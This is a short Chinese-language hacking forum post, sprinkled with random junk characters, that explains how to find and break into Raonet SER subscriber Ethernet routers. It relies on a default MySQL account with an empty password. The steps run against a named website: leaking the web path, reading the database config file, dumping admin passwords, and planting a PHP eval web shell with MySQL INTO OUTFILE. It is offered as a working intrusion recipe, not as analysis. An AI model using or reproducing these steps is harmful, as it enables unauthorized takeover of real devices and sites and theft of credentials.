寻找存在漏洞的路由器方法:
+ v. v! }4 V/ Z5 [
6 [4 F' O" U; b8 q! h$ [/ m1:google搜索'Raonet Subscriber Ethernet Router'
& w- |' I$ N2 ?" ~0 J* U# \' u& Q# ^- ~% d' \
2:使用WebDAVScan扫80端口,http banner为thttpd/2.21b 23apr20016 |5 l% Y4 y% x+ v' K
( M5 f/ R* J3 _3 V! V& k6 z; ?3:扫mysql版本号判断,SER系列路由器使用的mysql版本4.0.14,默认有一个高权限的帐户mysql,口令为空。( ~8 d) t' e; t1 |+ l- {% d) r: _
. ~# _# y8 `8 Z; p1 u9 h, r
//还有很多方法可以批量获取,这里不发了,请自食其力 公开了大家都玩不成......9 w- B: k7 B! D6 |
- Z0 B* @! }- `/ |/ E* j, Y+ i
$ N% C, p% D" n. |$ T* a
5 B$ f8 U/ }: z7 N5 s入侵步骤:
0 n ~' o1 p6 i* R1 o$ n: v8 v( S
1.爆web路径,http://www.yu1u.org/src/jpgraph_line.php( U3 h3 c- c- y
4 |' e2 F7 I2 r
2:查看数据库配置文件,http://www.yu1u.org/inc/conn_db.inc
/ p& V: B" g' r. L3:得到密码后连接,查看GUI管理密码:+ Q5 _8 y* z& ]+ V: B
use ser_500
[ W: G& q; t' iselect id,passwd from user;
" e0 c1 t! E: h) g i4:通过数据库写入webshell,执行命令:
4 T* b# D; v m: ?( g7 Quse mysql;# ^" ^ Q7 _% ?( p
create table ok(cmd TEXT);
0 \' k6 [+ J! I8 v' [6 rinsert into ok values("<?php @eval($_POST[cmd])?>");* ` U/ r6 O7 Y2 r
select * from ok into outfile "\/usr\/local\/www\/data\/src\/shell.php";; o4 y8 v8 q9 i$ B0 S! F9 D
drop table ok;
, j0 Z; o* D7 ^ c3 B# t3 j+ M
5 z/ @4 d: R$ M5:连接后门shell.php
+ `6 W2 d5 L, {3 L; P7 Z+ F3 }7 p. `# c2 F0 D( R
6. 搞定! W( J- c! @# p
( I W* W* f: G# K4 x% {0 u. t |